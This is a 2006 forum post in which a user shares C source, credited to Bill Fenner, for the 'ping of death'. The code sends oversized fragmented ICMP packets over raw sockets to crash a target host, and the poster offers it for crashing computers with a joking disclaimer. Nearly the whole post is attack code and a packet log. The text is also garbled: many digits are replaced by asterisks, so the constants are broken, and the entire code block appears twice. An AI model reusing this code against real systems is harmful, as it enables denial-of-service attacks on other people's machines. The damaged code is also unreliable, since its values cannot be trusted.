Moonbat
09-24-2006, 01:17 PM
Here is a code I found - NOT claiming to be mine - that is written in C (and hence works for C++) that can send out huge ping packets and crash computers. DISCLAIMER - I am not responsible for what you do with this:D
/*
* win*5ping.c
*
* Simulate the evil win*5 "ping -l 655*0 b***yhost".
* version *.0 Bill Fenner <fenner@freebsd.org> 22-Oct-***6
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.*-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win*5 box looks like:
* *7:26:**.0**622 cslwin*5 > arkroyal: icmp: echo request (frag 6*44:*480@0+)
* *7:26:**.0*507* cslwin*5 > arkroyal: (frag 6*44:*480@*480+)
* *7:26:**.0*66*7 cslwin*5 > arkroyal: (frag 6*44:*480@2*60+)
* *7:26:**.0*7577 cslwin*5 > arkroyal: (frag 6*44:*480@4440+)
* *7:26:**.0*88** cslwin*5 > arkroyal: (frag 6*44:*480@5*20+)
* *7:26:**.020**2 cslwin*5 > arkroyal: (frag 6*44:*480@7400+)
* *7:26:**.02**46 cslwin*5 > arkroyal: (frag 6*44:*480@8880+)
* *7:26:**.02264* cslwin*5 > arkroyal: (frag 6*44:*480@*0*60+)
* *7:26:**.02*86* cslwin*5 > arkroyal: (frag 6*44:*480@**840+)
* *7:26:**.025*40 cslwin*5 > arkroyal: (frag 6*44:*480@***20+)
* *7:26:**.026604 cslwin*5 > arkroyal: (frag 6*44:*480@*4800+)
* *7:26:**.027628 cslwin*5 > arkroyal: (frag 6*44:*480@*6280+)
* *7:26:**.02887* cslwin*5 > arkroyal: (frag 6*44:*480@*7760+)
* *7:26:**.0*0*00 cslwin*5 > arkroyal: (frag 6*44:*480@**240+)
* *7:26:**.0***07 cslwin*5 > arkroyal: (frag 6*44:*480@20720+)
* *7:26:**.0*2542 cslwin*5 > arkroyal: (frag 6*44:*480@22200+)
* *7:26:**.0**774 cslwin*5 > arkroyal: (frag 6*44:*480@2*680+)
* *7:26:**.0*50*8 cslwin*5 > arkroyal: (frag 6*44:*480@25*60+)
* *7:26:**.0*6576 cslwin*5 > arkroyal: (frag 6*44:*480@26640+)
* *7:26:**.0*7464 cslwin*5 > arkroyal: (frag 6*44:*480@28*20+)
* *7:26:**.0*86*6 cslwin*5 > arkroyal: (frag 6*44:*480@2*600+)
* *7:26:**.0***66 cslwin*5 > arkroyal: (frag 6*44:*480@**080+)
* *7:26:**.04*2*8 cslwin*5 > arkroyal: (frag 6*44:*480@*2560+)
* *7:26:**.04257* cslwin*5 > arkroyal: (frag 6*44:*480@*4040+)
* *7:26:**.04*807 cslwin*5 > arkroyal: (frag 6*44:*480@*5520+)
* *7:26:**.046276 cslwin*5 > arkroyal: (frag 6*44:*480@*7000+)
* *7:26:**.0472*6 cslwin*5 > arkroyal: (frag 6*44:*480@*8480+)
* *7:26:**.048478 cslwin*5 > arkroyal: (frag 6*44:*480@***60+)
* *7:26:**.04*6*8 cslwin*5 > arkroyal: (frag 6*44:*480@4*440+)
* *7:26:**.050*2* cslwin*5 > arkroyal: (frag 6*44:*480@42*20+)
* *7:26:**.052*64 cslwin*5 > arkroyal: (frag 6*44:*480@44400+)
* *7:26:**.05***8 cslwin*5 > arkroyal: (frag 6*44:*480@45880+)
* *7:26:**.054685 cslwin*5 > arkroyal: (frag 6*44:*480@47*60+)
* *7:26:**.056*47 cslwin*5 > arkroyal: (frag 6*44:*480@48840+)
* *7:26:**.057*** cslwin*5 > arkroyal: (frag 6*44:*480@50*20+)
* *7:26:**.058*57 cslwin*5 > arkroyal: (frag 6*44:*480@5*800+)
* *7:26:**.05*588 cslwin*5 > arkroyal: (frag 6*44:*480@5*280+)
* *7:26:**.060787 cslwin*5 > arkroyal: (frag 6*44:*480@54760+)
* *7:26:**.06202* cslwin*5 > arkroyal: (frag 6*44:*480@56240+)
* *7:26:**.06*247 cslwin*5 > arkroyal: (frag 6*44:*480@57720+)
* *7:26:**.06447* cslwin*5 > arkroyal: (frag 6*44:*480@5*200+)
* *7:26:**.066252 cslwin*5 > arkroyal: (frag 6*44:*480@60680+)
* *7:26:**.066*57 cslwin*5 > arkroyal: (frag 6*44:*480@62*60+)
* *7:26:**.068220 cslwin*5 > arkroyal: (frag 6*44:*480@6*640+)
* *7:26:**.06**07 cslwin*5 > arkroyal: (frag 6*44:**8@65*20)
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[*500];
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + *);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = *;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(*);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(*);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(*);
}
if ((hp = gethostbyname(argv[*])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[*])) == -*) {
fprintf(stderr, "%s: unknown host\n", argv[*]);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4*2*);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = *;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 655*6; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> *);
if (offset < 65*20)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(4*8); /* make total 655*8 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}
/*
* win*5ping.c
*
* Simulate the evil win*5 "ping -l 655*0 b***yhost".
* version *.0 Bill Fenner <fenner@freebsd.org> 22-Oct-***6
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.*-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win*5 box looks like:
* *7:26:**.0**622 cslwin*5 > arkroyal: icmp: echo request (frag 6*44:*480@0+)
* *7:26:**.0*507* cslwin*5 > arkroyal: (frag 6*44:*480@*480+)
* *7:26:**.0*66*7 cslwin*5 > arkroyal: (frag 6*44:*480@2*60+)
* *7:26:**.0*7577 cslwin*5 > arkroyal: (frag 6*44:*480@4440+)
* *7:26:**.0*88** cslwin*5 > arkroyal: (frag 6*44:*480@5*20+)
* *7:26:**.020**2 cslwin*5 > arkroyal: (frag 6*44:*480@7400+)
* *7:26:**.02**46 cslwin*5 > arkroyal: (frag 6*44:*480@8880+)
* *7:26:**.02264* cslwin*5 > arkroyal: (frag 6*44:*480@*0*60+)
* *7:26:**.02*86* cslwin*5 > arkroyal: (frag 6*44:*480@**840+)
* *7:26:**.025*40 cslwin*5 > arkroyal: (frag 6*44:*480@***20+)
* *7:26:**.026604 cslwin*5 > arkroyal: (frag 6*44:*480@*4800+)
* *7:26:**.027628 cslwin*5 > arkroyal: (frag 6*44:*480@*6280+)
* *7:26:**.02887* cslwin*5 > arkroyal: (frag 6*44:*480@*7760+)
* *7:26:**.0*0*00 cslwin*5 > arkroyal: (frag 6*44:*480@**240+)
* *7:26:**.0***07 cslwin*5 > arkroyal: (frag 6*44:*480@20720+)
* *7:26:**.0*2542 cslwin*5 > arkroyal: (frag 6*44:*480@22200+)
* *7:26:**.0**774 cslwin*5 > arkroyal: (frag 6*44:*480@2*680+)
* *7:26:**.0*50*8 cslwin*5 > arkroyal: (frag 6*44:*480@25*60+)
* *7:26:**.0*6576 cslwin*5 > arkroyal: (frag 6*44:*480@26640+)
* *7:26:**.0*7464 cslwin*5 > arkroyal: (frag 6*44:*480@28*20+)
* *7:26:**.0*86*6 cslwin*5 > arkroyal: (frag 6*44:*480@2*600+)
* *7:26:**.0***66 cslwin*5 > arkroyal: (frag 6*44:*480@**080+)
* *7:26:**.04*2*8 cslwin*5 > arkroyal: (frag 6*44:*480@*2560+)
* *7:26:**.04257* cslwin*5 > arkroyal: (frag 6*44:*480@*4040+)
* *7:26:**.04*807 cslwin*5 > arkroyal: (frag 6*44:*480@*5520+)
* *7:26:**.046276 cslwin*5 > arkroyal: (frag 6*44:*480@*7000+)
* *7:26:**.0472*6 cslwin*5 > arkroyal: (frag 6*44:*480@*8480+)
* *7:26:**.048478 cslwin*5 > arkroyal: (frag 6*44:*480@***60+)
* *7:26:**.04*6*8 cslwin*5 > arkroyal: (frag 6*44:*480@4*440+)
* *7:26:**.050*2* cslwin*5 > arkroyal: (frag 6*44:*480@42*20+)
* *7:26:**.052*64 cslwin*5 > arkroyal: (frag 6*44:*480@44400+)
* *7:26:**.05***8 cslwin*5 > arkroyal: (frag 6*44:*480@45880+)
* *7:26:**.054685 cslwin*5 > arkroyal: (frag 6*44:*480@47*60+)
* *7:26:**.056*47 cslwin*5 > arkroyal: (frag 6*44:*480@48840+)
* *7:26:**.057*** cslwin*5 > arkroyal: (frag 6*44:*480@50*20+)
* *7:26:**.058*57 cslwin*5 > arkroyal: (frag 6*44:*480@5*800+)
* *7:26:**.05*588 cslwin*5 > arkroyal: (frag 6*44:*480@5*280+)
* *7:26:**.060787 cslwin*5 > arkroyal: (frag 6*44:*480@54760+)
* *7:26:**.06202* cslwin*5 > arkroyal: (frag 6*44:*480@56240+)
* *7:26:**.06*247 cslwin*5 > arkroyal: (frag 6*44:*480@57720+)
* *7:26:**.06447* cslwin*5 > arkroyal: (frag 6*44:*480@5*200+)
* *7:26:**.066252 cslwin*5 > arkroyal: (frag 6*44:*480@60680+)
* *7:26:**.066*57 cslwin*5 > arkroyal: (frag 6*44:*480@62*60+)
* *7:26:**.068220 cslwin*5 > arkroyal: (frag 6*44:*480@6*640+)
* *7:26:**.06**07 cslwin*5 > arkroyal: (frag 6*44:**8@65*20)
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[*500];
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + *);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = *;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(*);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(*);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(*);
}
if ((hp = gethostbyname(argv[*])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[*])) == -*) {
fprintf(stderr, "%s: unknown host\n", argv[*]);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4*2*);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = *;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 655*6; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> *);
if (offset < 65*20)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(4*8); /* make total 655*8 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}